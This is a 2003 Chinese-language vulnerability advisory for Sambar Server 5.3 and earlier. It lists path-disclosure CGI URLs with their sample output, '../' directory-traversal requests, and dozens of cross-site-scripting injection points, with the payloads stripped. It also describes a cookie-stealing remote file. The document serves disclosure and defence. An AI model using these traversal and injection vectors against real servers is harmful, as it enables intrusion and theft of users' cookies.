积极预防 及时发现
快速响应 力保恢复
Sambar Server 存在多个缺陷 (Other,缺陷)
发布时间:2003-03-31 信息来源:管理员

涉及程序: Sambar Server 5.3版及其之前的版本 描述: Sambar Server 存在多个缺陷 详细: Sambar Server是一款高性能多功能的WEB服务器,可运行于Windows 95/98/NT/2000/XP。Sambar Server 存在多个缺陷: 1、路径揭发: 缺省安装的Sambar服务器的CGI二进制目录包含testcgi.exe和environ.pl程序,这些程序能允许远程攻击者获得操作系统或WEB服务器目录的信息。远程攻击者通过向目标服务器提交精心构造的下列格式的临时HTTP请求,就能使用该缺陷: http:// /cgi-bin/environ.pl http:// /cgi-bin/testcgi.exe 将获得下列输出: - environ.pl : -------------- Sambar Server CGI Environment Variables GATEWAY_INTERFACE: CGI/1.1 PATH_INFO: PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl QUERY_STRING: REMOTE_ADDR: 127.0.0.1 REMOTE_HOST: REMOTE_USER: REQUEST_METHOD: GET DOCUMENT_NAME: environ.pl DOCUMENT_URI: /cgi-bin/environ.pl SCRIPT_NAME: /cgi-bin/environ.pl SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl SERVER_NAME: localhost SERVER_PORT: 80 SERVER_PROTOCOL: HTTP/1.1 SERVER_SOFTWARE: SAMBAR CONTENT_LENGTH: 0 CONTENT: - testcgi.exe : --------------- Test CGI ... Version 1.00 < build date 8-03-97 > QUERY_STRING PATH_INFO PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe SCRIPT_NAME /cgi-bin/testcgi.exe SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe DOCUMENT_ROOT C:/sambar53/docs/ HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) REMOTE_ADDR 127.0.0.1 REMOTE_HOST SERVER_NAME localhost SERVER_PROTOCOL HTTP/1.1 SERVER_SOFTWARE SAMBAR CONTENT_TYPE ---------------------------- 2、目录揭发: Sambar Server存在目录揭发缺陷,能使攻击者获得WEB服务器上文件和目录的内容。攻击者通过利用iecreate.stm和ieedit.stm程序,在向目标机器提供精心构造的下列格式的临时URL中添加“../”字符串能触发该缺陷: http:// /sysuser/docmgr/iecreate.stm?template=../ http:// /sysuser/docmgr/ieedit.stm?url=../ 3、跨站脚本执行缺陷: Sambar Server 存在跨站脚本执行缺陷,攻击者使用精心构造的下列格式的临时URL能在客户的机器上执行任意代码: http:// /netutils/ipdata.stm?ipaddr= http:// /netutils/whodata.stm?sitename= http:// /netutils/findata.stm?user= http:// /netutils/findata.stm?host= http:// /isapi/testisa.dll?check1= http:// /cgi-bin/environ.pl?param1= http:// /samples/search.dll?query= &logic=AND http:// /wwwping/index.stm?wwwsite= http:// /syshelp/stmex.stm?foo= &bar=456 http:// /syshelp/stmex.stm?foo=123&bar= http:// /syshelp/cscript/showfunc.stm?func= http:// /syshelp/cscript/showfncs.stm?pkg= http:// /syshelp/cscript/showfnc.stm?pkg= http:// /sysuser/docmgr/ieedit.stm?path= http:// /sysuser/docmgr/ieedit.stm?name= http:// /sysuser/docmgr/edit.stm?path= http:// /sysuser/docmgr/edit.stm?name= http:// /sysuser/docmgr/iecreate.stm?path= http:// /sysuser/docmgr/create.stm?path= http:// /sysuser/docmgr/info.stm?path= http:// /sysuser/docmgr/info.stm?name= http:// /sysuser/docmgr/ftp.stm?path= http:// /sysuser/docmgr/htaccess.stm?path= http:// /sysuser/docmgr/mkdir.stm?path= http:// /sysuser/docmgr/rename.stm?path= http:// /sysuser/docmgr/rename.stm?name= http:// /sysuser/docmgr/search.stm?path= http:// /sysuser/docmgr/search.stm?query= http:// /sysuser/docmgr/sendmail.stm?path= http:// /sysuser/docmgr/sendmail.stm?name= http:// /sysuser/docmgr/template.stm?path= http:// /sysuser/docmgr/update.stm?path= http:// /sysuser/docmgr/update.stm?name= http:// /sysuser/docmgr/vccheckin.stm?path= http:// /sysuser/docmgr/vccheckin.stm?name= http:// /sysuser/docmgr/vccreate.stm?path= http:// /sysuser/docmgr/vccreate.stm?name= http:// /sysuser/docmgr/vchist.stm?path= http:// /sysuser/docmgr/vchist.stm?name= http:// /cgi-bin/testcgi.exe? Sambar Server 还存在另一个跨站脚本执行缺陷,利用包含恶意代码的远程文件,通过下列格式的URL能触发该缺陷: http:// /sysuser/docmgr/ieedit.stm?url=http:// /hostile_file.htm 恶意代码格式为: (使用访问者的cookie打开窗口) (用<>替换<>) 攻击方法: 示例攻击代码请参见“详细”。 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.sambar.com/